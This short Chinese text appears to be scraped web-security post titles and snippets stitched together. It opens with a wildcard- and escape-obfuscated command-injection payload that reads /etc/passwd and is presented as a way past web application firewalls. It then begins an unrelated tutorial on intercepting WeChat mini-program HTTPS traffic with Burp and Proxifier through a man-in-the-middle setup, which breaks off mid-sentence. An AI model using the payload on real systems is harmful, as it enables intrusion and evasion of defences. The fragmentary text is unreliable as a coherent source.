cat /etc/passwd 变种可绕waf
一个命令执行变种 t\a\c$@</*?c/*?*?*w\d
burp微信抓取小程序流量
微信小程序是一种基于微信平台的轻量级应用,可以在微信内部运行,无需下载安装。微信小程序的通信协议是基于HTTPS的,因此,如果想要抓取微信小程序的网络请求和响应,就需要使用一些工具来进行中间人攻击(Man-in-the-Middle Attack,简称MITM)。本文将介绍如何使用Proxifier